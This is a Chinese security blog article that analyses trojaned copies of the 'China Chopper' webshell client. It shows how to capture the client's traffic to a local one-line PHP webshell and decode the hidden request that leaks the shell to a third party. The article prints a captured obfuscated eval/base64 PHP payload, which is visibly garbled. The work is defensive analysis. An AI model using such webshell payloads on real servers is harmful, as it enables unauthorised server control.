1. 极安网首页
  2. 网络安全技术

你的"中国菜刀"是否包含后门shell?教你如何分析并反杀!

前言

中国菜刀”对于渗透测试者来说耳熟能详,但是大家用的菜刀真的安全吗?

你能保证你所使用的工具不会被别人偷偷的塞入后门吗?如果菜刀中被塞入后门 那我们岂不是成了别人的苦力。

辛辛苦苦拿下的shell就这样不知不觉的被别人窃取,怎能好意思说自己是一名”小黑客”呢!

所以极度安全从网上分别找到两个带有HTTP后门及TCP后门的菜刀,教给大家如何去分析及防范提权工具中的后门。

1、HTTP后门菜刀

HTTP后门是最容易发现的后门了,我们只需要抓一个包,再对数据包的内容进行解密,及可得到幕后黑手的后门地址。我们在本地phpstudy上写一个一句话木马,并且让带有后门的菜刀去链接我们的一句话hez.php,同时对后门菜刀进行抓包。

你的

这里我们对第四个包进行分析,因为我们在包的内容里面发现了我们一句话木马的密码后面跟了一串URL编码的数据。

  1. hackxxx=624_23Dstrrev%28edoced_46esab829%3B%4Beva128%24_%28%24_POST%5Bz8%5D%29%29% 3B&z0=QGU2YwwoYmFZZTY8K2RRUND1NU1UWYkoweDUnN1UuMFRNFOU1TbDdjNlYwWTISdnEybGxLQ2R
  2. NZUd SbEp5d3hLUHRBWm1sc1pTz
  3. 25hSFIwY SRudkwZzZDNKeRRTGISZ1UwMa1ZTU31.U1JMR1ZSUK5UMDFIWU1NTZGRNaWNtvUdGenN6NG5NbXRs2UNna1qxQ1BUNUFwS1R8OScpKTtAaW5pX3NIdCgizGl2cGxheW91.
  4. nJvcnMiLCIuIik7QHN1dF9Saw1
  5.  lX2xpbw18KDAp08BzZXRFbWFnaWNFcXUudCUzX3J1bnRpbWUoNCk7ZWNobygiLT58Iik70gREPMRpcmn5hbWUOJF9TRUMRUJt
  6.  I 1NDUk1QUF9GSUxFTkFNRSJdKT
  7. tp2igkRD89TiIp4EQ9Z61ybnF t2SgkXI1NFU1HNYnNCcigkRCwwL DEpIT@iLyIpe22vcmUh2gocnF uZ2oIkEiLc.alikgYXMNgJEwpaWoaXNYZGlyKCJ7JEOi1pKSRSL j sieyRMFToi03 8kUi4911.0l jskdT oZnUU'3Rpb25fZXhpcBRzKCdwB3HpeF9nZXR1221kJykpPBBwb3NpeF9nzXRwd30pZChacG9zaXhf2208zX0pzCgpKTonJzskdXNyPSgkdSk%
  8.  2FJHUbJ25hbWUnX

我们对数据进行url解码:

你的

发现这里可以进行base64解码:

你的

这里解码后我们发现还可以进行一次base64解码:

你的

经过三次解码后,我们找到了后门的地址。

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/3110.html